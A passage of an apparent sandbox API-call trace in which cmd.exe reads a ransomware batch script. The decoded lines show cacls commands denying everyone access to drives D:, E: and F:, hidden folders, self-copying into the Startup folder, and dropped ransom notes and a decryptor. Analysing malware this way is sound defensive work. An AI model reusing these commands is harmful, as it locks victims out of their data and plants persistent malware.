lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0078.545] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.545] GetFileType (hFile=0x158) returned 0x1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0078.545] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0078.545] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0078.545] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.545] GetFileType (hFile=0x158) returned 0x1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0078.545] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0078.545] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0078.545] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.545] GetFileType (hFile=0x158) returned 0x1 [0078.545] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0078.545] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0078.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0078.546] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.546] GetFileType (hFile=0x158) returned 0x1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0078.546] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0078.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0078.546] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.546] GetFileType (hFile=0x158) returned 0x1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0078.546] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0078.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0078.546] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.546] GetFileType (hFile=0x158) returned 0x1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0078.546] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0078.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0078.546] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.546] GetFileType (hFile=0x158) returned 0x1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0078.546] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.546] SetFilePointer (in: hFile=0x158, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0078.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0078.547] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.547] GetFileType (hFile=0x158) returned 0x1 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0078.547] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0078.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0078.547] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.547] GetFileType (hFile=0x158) returned 0x1 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0078.547] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0078.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0078.547] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.547] GetFileType (hFile=0x158) returned 0x1 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0078.547] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0078.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0078.547] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.547] GetFileType (hFile=0x158) returned 0x1 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0078.547] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0078.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0078.547] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0078.547] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.547] GetFileType (hFile=0x158) returned 0x1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0078.548] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0078.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0078.548] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.548] GetFileType (hFile=0x158) returned 0x1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0078.548] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0078.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0078.548] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.548] GetFileType (hFile=0x158) returned 0x1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0078.548] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0078.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0078.548] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.548] GetFileType (hFile=0x158) returned 0x1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0078.548] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0078.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0078.548] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.548] GetFileType (hFile=0x158) returned 0x1 [0078.548] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0078.548] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0078.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0078.549] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.549] GetFileType (hFile=0x158) returned 0x1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0078.549] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0078.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0078.549] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.549] GetFileType (hFile=0x158) returned 0x1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0078.549] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0078.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0078.549] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.549] GetFileType (hFile=0x158) returned 0x1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0078.549] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0078.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0078.549] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.549] GetFileType (hFile=0x158) returned 0x1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0078.549] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0078.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0078.549] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0078.550] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.550] GetFileType (hFile=0x158) returned 0x1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0078.550] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0078.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0078.550] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.550] GetFileType (hFile=0x158) returned 0x1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0078.550] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0078.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0078.550] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.550] GetFileType (hFile=0x158) returned 0x1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0078.550] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0078.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0078.550] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.550] GetFileType 